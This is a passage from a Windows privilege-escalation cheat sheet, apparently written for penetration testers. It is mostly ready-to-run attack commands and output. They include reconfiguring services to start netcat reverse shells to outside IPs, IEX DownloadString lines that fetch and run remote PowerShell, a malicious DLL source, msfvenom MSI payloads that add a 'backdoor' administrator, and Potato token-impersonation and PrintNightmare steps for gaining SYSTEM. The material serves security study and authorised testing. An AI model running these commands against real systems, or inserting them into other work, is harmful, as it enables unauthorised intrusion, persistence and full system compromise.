Menu\Programs\Startup" ``` ## EoP - Incorrect permissions in services > A service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. You can replace the binary, restart the service and get system. Often, services are pointing to writeable locations: - Orphaned installs, not installed anymore but still exist in startup - DLL Hijacking ```powershell # find missing DLL - Find-PathDLLHijack PowerUp.ps1 - Process Monitor : check for "Name Not Found" # compile a malicious dll - For x64 compile with: "x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll" - For x86 compile with: "i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll" # content of windows_dll.c #include <windows.h> BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { if (dwReason == DLL_PROCESS_ATTACH) { system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt"); ExitProcess(0); } return TRUE; } ``` - PATH directories with weak permissions ```powershell $ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt $ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a" $ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt FOR /F %i in (Servicenames.txt) DO echo %i type Servicenames.txt FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt ``` Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions` Note to check file permissions you can use `cacls` and `icacls` > icacls (Windows Vista +) > cacls (Windows XP) You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify access) or `BUILTIN\Users:(W)`(Write-only access) in the output. ### Example with Windows 10 - CVE-2019-1322 UsoSvc Prerequisite: Service account ```powershell PS C:\Windows\system32> sc.exe stop UsoSvc PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe" PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe" PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd /C C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe" PS C:\Windows\system32> sc.exe qc usosvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: usosvc TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 2 AUTO_START (DELAYED) ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Update Orchestrator Service DEPENDENCIES : rpcss SERVICE_START_NAME : LocalSystem PS C:\Windows\system32> sc.exe start UsoSvc ``` ### Example with Windows XP SP1 - upnphost ```powershell # NOTE: spaces are mandatory for this exploit to work ! sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe" sc config upnphost obj= ".\LocalSystem" password= "" sc qc upnphost sc config upnphost depend= "" net start upnphost ``` If it fails because of a missing dependency, try the following commands. ```powershell sc config SSDPSRV start=auto net start SSDPSRV net stop upnphost net start upnphost sc config upnphost depend="" ``` Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals or [accesschk-XP.exe - github.com/phackt](https://github.com/phackt/pentest/blob/master/privesc/windows/accesschk-XP.exe) ```powershell $ accesschk.exe -uwcqv "Authenticated Users" * /accepteula RW SSDPSRV SERVICE_ALL_ACCESS RW upnphost SERVICE_ALL_ACCESS $ accesschk.exe -ucqv upnphost upnphost RW NT AUTHORITY\SYSTEM SERVICE_ALL_ACCESS RW BUILTIN\Administrators SERVICE_ALL_ACCESS RW NT AUTHORITY\Authenticated Users SERVICE_ALL_ACCESS RW BUILTIN\Power Users SERVICE_ALL_ACCESS $ sc config <vuln-service> binpath="net user backdoor backdoor123 /add" $ sc config <vuln-service> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe" $ sc stop <vuln-service> $ sc start <vuln-service> $ sc config <vuln-service> binpath="net localgroup Administrators backdoor /add" $ sc stop <vuln-service> $ sc start <vuln-service> ``` ## EoP - Windows Subsystem for Linux (WSL) Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032) > With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ <distro>.exe --default-user root. Now start your bind shell or reverse. ```powershell wsl whoami ./ubuntun1604.exe config --default-user root wsl whoami wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE' ``` Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe` Alternatively you can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` ## EoP - Unquoted Service Paths The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first. ```powershell wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """ gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name ``` * Metasploit exploit : `exploit/windows/local/trusted_service_path` * PowerUp exploit ```powershell # find the vulnerable application C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks" ... [*] Checking for unquoted service paths... ServiceName : BBSvc Path : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe StartName : LocalSystem AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path <HijackPath> ... # automatic exploit Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe" ``` ### Example For `C:\Program Files\something\legit.exe`, Windows will try the following paths first: - `C:\Program.exe` - `C:\Program Files.exe` ## EoP - $PATH Interception Requirements: - PATH contains a writeable folder with low privileges. - The writeable folder is _before_ the folder that contains the legitimate binary. EXAMPLE: ```powershell # List contents of the PATH environment variable # EXAMPLE OUTPUT: C:\Program Files\nodejs\;C:\WINDOWS\system32 $env:Path # See permissions of the target folder # EXAMPLE OUTPUT: BUILTIN\Users: GR,GW icacls.exe "C:\Program Files\nodejs\" # Place our evil-file in that folder. copy evil-file.exe "C:\Program Files\nodejs\cmd.exe" ``` Because (in this example) "C:\Program Files\nodejs\" is _before_ "C:\WINDOWS\system32\" on the PATH variable, the next time the user runs "cmd.exe", our evil version in the nodejs folder will run, instead of the legitimate one in the system32 folder. ## EoP - Named Pipes 1. Find named pipes: `[System.IO.Directory]::GetFiles("\\.\pipe\")` 2. Check named pipes DACL: `pipesec.exe <named_pipe>` 3. Reverse engineering software 4. Send data throught the named pipe : `program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe` ## EoP - Kernel Exploitation List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits) ##### #Security Bulletin&nbsp;&nbsp;&nbsp;#KB &nbsp;&nbsp;&nbsp;&nbsp;#Description&nbsp;&nbsp;&nbsp;&nbsp;#Operating System - [MS17-017](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-017)  [KB4013081]  [GDI Palette Objects Local Privilege Escalation]  (windows 7/8) - [CVE-2017-8464](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-8464)  [LNK Remote Code Execution Vulnerability]  (windows 10/8.1/7/2016/2010/2008) - [CVE-2017-0213](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213)  [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008) - [CVE-2018-0833](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-0833) [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012 R2) - [CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120) [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2 SP1) - [MS17-010](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-010)  [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP) - [MS16-135](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135)  [KB3199135]  [Windows Kernel Mode Drivers]  (2016) - [MS16-111](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-111)  [KB3186973]  [kernel api]  (Windows 10 10586 (32/64)/8.1) - [MS16-098](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098)  [KB3178466]  [Kernel Driver]  (Win 8.1) - [MS16-075](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075)  [KB3164038]  [Hot Potato]  (2003/2008/7/8/2012) - [MS16-034](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034)  [KB3143145]  [Kernel Driver]  (2008/7/8/10/2012) - [MS16-032](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032)  [KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012) - [MS16-016](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-016)  [KB3136041]  [WebDAV]  (2008/Vista/7) - [MS16-014](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-014)  [K3134228]  [remote code execution]  (2008/Vista/7) ... - [MS03-026](./MS03-026)  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003) To cross compile a program from Kali, use the following command. ```powershell Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c ``` ## EoP - AlwaysInstallElevated Check if these registry values are set to "1". ```powershell $ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated $ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated $ Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer $ Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer ``` Then create an MSI package and install it. ```powershell $ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi $ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi-nouac -o evil.msi $ msiexec /quiet /qn /i C:\evil.msi ``` Technique also available in : * Metasploit : `exploit/windows/local/always_install_elevated` * PowerUp.ps1 : `Get-RegistryAlwaysInstallElevated`, `Write-UserAddMSI` ## EoP - Insecure GUI apps Application running as SYSTEM allowing an user to spawn a CMD, or browse directories. Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt" ## EoP - Evaluating Vulnerable Drivers Look for vuln drivers loaded, we often don't spend enough time looking at this: * [Living Off The Land Drivers](https://www.loldrivers.io/) is a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks. The project helps security professionals stay informed and mitigate potential threats. * Native binary: DriverQuery.exe ```powershell PS C:\Users\Swissky> driverquery.exe /fo table /si Module Name Display Name Driver Type Link Date ============ ====================== ============= ====================== 1394ohci 1394 OHCI Compliant Ho Kernel 12/10/2006 4:44:38 PM 3ware 3ware Kernel 5/18/2015 6:28:03 PM ACPI Microsoft ACPI Driver Kernel 12/9/1975 6:17:08 AM AcpiDev ACPI Devices driver Kernel 12/7/1993 6:22:19 AM acpiex Microsoft ACPIEx Drive Kernel 3/1/2087 8:53:50 AM acpipagr ACPI Processor Aggrega Kernel 1/24/2081 8:36:36 AM AcpiPmi ACPI Power Meter Drive Kernel 11/19/2006 9:20:15 PM acpitime ACPI Wake Alarm Driver Kernel 2/9/1974 7:10:30 AM ADP80XX ADP80XX Kernel 4/9/2015 4:49:48 PM <SNIP> ``` * [matterpreter/OffensiveCSharp/DriverQuery](https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery) ```powershell PS C:\Users\Swissky> DriverQuery.exe --no-msft [+] Enumerating driver services... [+] Checking file signatures... Citrix USB Filter Driver Service Name: ctxusbm Path: C:\Windows\system32\DRIVERS\ctxusbm.sys Version: 14.11.0.138 Creation Time (UTC): 17/05/2018 01:20:50 Cert Issuer: CN=Symantec Class 3 SHA256 Code Signing CA, OU=Symantec Trust Network, O=Symantec Corporation, C=US Signer: CN="Citrix Systems, Inc.", OU=XenApp(ClientSHA256), O="Citrix Systems, Inc.", L=Fort Lauderdale, S=Florida, C=US <SNIP> ``` ## EoP - Printers ### Universal Printer Create a Printer ```ps1 $printerName = 'Universal Priv Printer' $system32 = $env:systemroot + '\system32' $drivers = $system32 + '\spool\drivers' $RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mimispool.dll') Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\x64\3\mimispool.dll') Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers + '\W32X86\3\mimispool.dll') Add-PrinterDriver -Name 'Generic / Text Only' Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType 'String' -Value 'x64\3' | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null New-Item -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String' -Value 'W32X86\3' | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null New-Item -Path ($RegStartPrinter + '\CopyFiles\Mango') | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Directory' -PropertyType 'String' -Value $null | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Files' -PropertyType 'MultiString' -Value $null | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Module' -PropertyType 'String' -Value 'mimispool.dll' | Out-Null ``` Execute the driver ```ps1 $serverName = 'dc.purple.lab' $printerName = 'Universal Priv Printer' $fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'}) Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue Add-Printer -ConnectionName $fullprinterName ``` ### PrinterNightmare ```ps1 git clone https://github.com/Flangvik/DeployPrinterNightmare PS C:\adversary> FakePrinter.exe 32mimispool.dll 64mimispool.dll EasySystemShell [<3] @Flangvik - TrustedSec [+] Copying C:\Windows\system32\mscms.dll to C:\Windows\system32\6cfbaf26f4c64131896df8a522546e9c.dll [+] Copying 64mimispool.dll to C:\Windows\system32\spool\drivers\x64\3\6cfbaf26f4c64131896df8a522546e9c.dll [+] Copying 32mimispool.dll to C:\Windows\system32\spool\drivers\W32X86\3\6cfbaf26f4c64131896df8a522546e9c.dll [+] Adding printer driver => Generic / Text Only! [+] Adding printer => EasySystemShell! [+] Setting 64-bit Registry key [+] Setting 32-bit Registry key [+] Setting '*' Registry key ``` ```ps1 PS C:\target> $serverName = 'printer-installed-host' PS C:\target> $printerName = 'EasySystemShell' PS C:\target> $fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'}) PS C:\target> Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue PS C:\target> Add-Printer -ConnectionName $fullprinterName ``` ### Bring Your Own Vulnerability Concealed Position : https://github.com/jacob-baines/concealed_position * ACIDDAMAGE - [CVE-2021-35449](https://nvd.nist.gov/vuln/detail/CVE-2021-35449) - Lexmark Universal Print Driver LPE * RADIANTDAMAGE - [CVE-2021-38085](https://nvd.nist.gov/vuln/detail/CVE-2021-38085) - Canon TR150 Print Driver LPE * POISONDAMAGE - [CVE-2019-19363](https://nvd.nist.gov/vuln/detail/CVE-2019-19363) - Ricoh PCL6 Print Driver LPE * SLASHINGDAMAGE - [CVE-2020-1300](https://nvd.nist.gov/vuln/detail/CVE-2020-1300) - Windows Print Spooler LPE ```powershell cp_server.exe -e ACIDDAMAGE # Get-Printer # Set the "Advanced Sharing Settings" -> "Turn off password protected sharing" cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE cp_client.exe -l -e ACIDDAMAGE ``` ## EoP - Runas Use the `cmdkey` to list the stored credentials on the machine. ```powershell cmdkey /list Currently stored credentials: Target: Domain:interactive=WORKGROUP\Administrator Type: Domain Password User: WORKGROUP\Administrator ``` Then you can use `runas` with the `/savecred` options in order to use the saved credentials. The following example is calling a remote binary via an SMB share. ```powershell runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" runas /savecred /user:Administrator "cmd.exe /k whoami" ``` Using `runas` with a provided set of credential. ```powershell C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe" ``` ```powershell $secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force $mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd) $computer = "<hostname>" [System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) ``` ## EoP - Abusing Shadow Copies If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation. ```powershell # List shadow copies using vssadmin (Needs Admnistrator Access) vssadmin list shadows # List shadow copies using diskshadow diskshadow list shadows all # Make a symlink to the shadow copy and access it mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\ ``` ## EoP - From local administrator to NT SYSTEM ```powershell PsExec.exe -i -s cmd.exe ``` ## EoP - Living Off The Land Binaries and Scripts Living Off The Land Binaries and Scripts (and also Libraries) : https://lolbas-project.github.io/ > The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques. A LOLBin/Lib/Script must: * Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft. Have extra "unexpected" functionality. It is not interesting to document intended use cases. Exceptions are application whitelisting bypasses * Have functionality that would be useful to an APT or red team ```powershell wmic.exe process call create calc regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Microsoft.Workflow.Compiler.exe tests.xml results.xml ``` ## EoP - Impersonation Privileges Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary below will only list direct ways to exploit the privilege to obtain an admin session or read sensitive files. | Privilege | Impact | Tool | Execution path | Remarks | | --- | --- | --- | --- | --- | |`SeAssignPrimaryToken`| ***Admin*** | 3rd party tool | *"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"* | Thank you [Aurélien Chalot](https://twitter.com/Defte_) for the update. I will try to re-phrase it to something more recipe-like soon. | |`SeBackup`| **Threat** | ***Built-in commands*** | Read sensitve files with `robocopy /b` |- May be more interesting if you can read %WINDIR%\MEMORY.DMP<br> <br>- `SeBackupPrivilege` (and robocopy) is not helpful when it comes to open files.<br> <br>- Robocopy requires both SeBackup and SeRestore to work with /b parameter. | |`SeCreateToken`| ***Admin*** | 3rd party tool | Create arbitrary token including local admin rights with `NtCreateToken`. || |`SeDebug`| ***Admin*** | **PowerShell** | Duplicate the `lsass.exe` token. | Script to be found at [FuzzySecurity](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Conjure-LSASS.ps1) | |`SeLoadDriver`| ***Admin*** | 3rd party tool | 1. Load buggy kernel driver such as `szkg64.sys` or `capcom.sys`<br>2. Exploit the driver vulnerability<br> <br> Alternatively, the privilege may be used to unload security-related drivers with `ftlMC` builtin command. i.e.: `fltMC sysmondrv` | 1. The `szkg64` vulnerability is listed as [CVE-2018-15732](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15732)<br>2. The `szkg64` [exploit code](https://www.greyhathacker.net/?p=1025) was created by [Parvez Anwar](https://twitter.com/parvezghh) | |`SeRestore`| ***Admin*** | **PowerShell** | 1. Launch PowerShell/ISE with the SeRestore privilege present.<br>2. Enable the privilege with [Enable-SeRestorePrivilege](https://github.com/gtworek/PSBits/blob/master/Misc/EnableSeRestorePrivilege.ps1)).<br>3. Rename utilman.exe to utilman.old<br>4. Rename cmd.exe to utilman.exe<br>5. Lock the console and press Win+U| Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | |`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`<br>2. `icalcs.exe "%windir%\system32" /grant "%username%":F`<br>3. Rename cmd.exe to utilman.exe<br>4. Lock the console and press Win+U| Attack may be detected by some AV software.<br> <br>Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | |`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.<br> <br>To be verified. || ### Restore A Service Account's Privileges > This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only. ```powershell # https://github.com/itm4n/FullPowers c:\TOOLS>FullPowers [+] Started dummy thread with id 9976 [+] Successfully created scheduled task. [+] Got new token! Privilege count: 7 [+] CreateProcessAsUser() OK Microsoft Windows [Version 10.0.19041.84] (c) 2019 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======= SeAssignPrimaryTokenPrivilege Replace a process level token Enabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled SeAuditPrivilege Generate security audits Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z ``` ### Meterpreter getsystem and alternatives ```powershell meterpreter> getsystem Tokenvator.exe getsystem cmd.exe incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe psexec -s -i cmd.exe python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc ``` ### RottenPotato (Token Impersonation) * Binary available at : [foxglovesec/RottenPotato](https://github.com/foxglovesec/RottenPotato) and [breenmachine/RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) * Exploit using Metasploit with `incognito mode` loaded. ```c getuid getprivs use incognito list\_tokens -u cd c:\temp\ execute -Hc -f ./rot.exe impersonate\_token "NT AUTHORITY\SYSTEM" ``` ```powershell Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser" Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM" Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};" ``` ### Juicy Potato (Abusing the golden privileges) > If the machine is **>= Windows 10 1809 & Windows Server 2019** - Try **Rogue Potato** > If the machine is **< Windows 10 1809 < Windows Server 2019** - Try **Juicy Potato** * Binary available at : [ohpe/juicy-potato](https://github.com/ohpe/juicy-potato/releases) 1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication) ```powershell whoami /priv ``` 2. Select a CLSID based on your Windows version, a CLSID is a globally unique identifier that identifies a COM class object * [Windows 7 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_7_Enterprise) * [Windows 8.1 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_8.1_Enterprise) * [Windows 10 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_10_Enterprise) * [Windows 10 Professional](https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro) * [Windows Server 2008 R2 Enterprise](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2008_R2_Enterprise) * [Windows Server 2012 Datacenter](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter) * [Windows Server 2016 Standard](https://ohpe.it/juicy-potato/CLSID/Windows_Server_2016_Standard) 3. Execute JuicyPotato to run a privileged command. ```powershell JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7} JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe" Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337 ...... [+] authresult 0 {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM [+] CreateProcessWithTokenW OK ``` ### Rogue Potato (Fake OXID Resolver) * Binary available at [antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) ```powershell # Network redirector / port forwarder to run on your remote machine, must use port 135 as src port socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999 # RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine. # Use this if you have fw restrictions. RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" # RoguePotato all in one with RogueOxidResolver running locally on port 9999 RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 #RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode ``` ### EFSPotato (MS-EFSR EfsRpcOpenFileRaw) * Binary available at https://github.com/zcgonvh/EfsPotato ```powershell # .NET 4.x csc EfsPotato.cs csc /platform:x86 EfsPotato.cs # .NET 2.0/3.5 C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs ``` ### JuicyPotatoNG * [antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG) ```powershell JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juicypotatong.txt ``` ## EoP - Privileged File Write ### DiagHub :warning: Starting with version 1903 and above, DiagHub can no longer be used to load arbitrary DLLs. The Microsoft Diagnostics Hub Standard Collector Service (DiagHub) is a service that collects trace information and is programmatically exposed via DCOM. This DCOM object can be used to load a DLL into a SYSTEM process, provided that this DLL exists in the `C:\Windows\System32` directory. #### Exploit 1. Create an [evil DLL](https://gist.github.com/xct/3949f3f4f178b1f3427fae7686a2a9c0) e.g: payload.dll and move it into `C:\Windows\System32` 2. Build https://github.com/xct/diaghub 3. `diaghub.exe c:\\ProgramData\\ payload.dll` The default payload will run `C:\Windows\System32\spool\drivers\color\nc.exe -lvp 2000 -e cmd.exe` Alternative tools: * https://github.com/Accenture/AARO-Bugs/tree/master/CVE-2020-5825/TrigDiag * https://github.com/decoder-it/diaghub_exploit ### UsoDLLLoader :warning: 2020-06-06 Update: this trick no longer works on the latest builds of Windows 10 Insider Preview. > An alternative to the DiagHub DLL loading "exploit" found by James Forshaw (a.k.a. @tiraniddo) If we found a privileged file write vulnerability in Windows or in some third-party software, we could copy our own version of `windowscoredeviceinfo.dll` into `C:\Windows\Sytem32\` and then have it loaded by the USO service to get arbitrary code execution as **NT AUTHORITY\System**. #### Exploit 1. Build https://github.com/itm4n/UsoDllLoader * Select Release config and x64 architecure. * Build solution. * DLL .\x64\Release\WindowsCoreDeviceInfo.dll * Loader .\x64\Release\UsoDllLoader.exe. 2. Copy `WindowsCoreDeviceInfo.dll` to `C:\Windows\System32\` 3. Use the loader and wait for the shell or run `usoclient StartInteractiveScan` and connect to the bind shell on port 1337. ### WerTrigger > Exploit Privileged File Writes bugs with Windows Problem Reporting 1. Clone https://github.com/sailay1996/WerTrigger 2. Copy `phoneinfo.dll` to `C:\Windows\System32\` 3. Place `Report.wer` file and `WerTrigger.exe` in a same directory. 4. Then, run `WerTrigger.exe`. 5. Enjoy a shell as **NT AUTHORITY\SYSTEM** ### WerMgr > Exploit Privileged Directory Creation Bugs with Windows Error Reporting 1. Clone https://github.com/binderlabs/DirCreate2System 2. Create directory 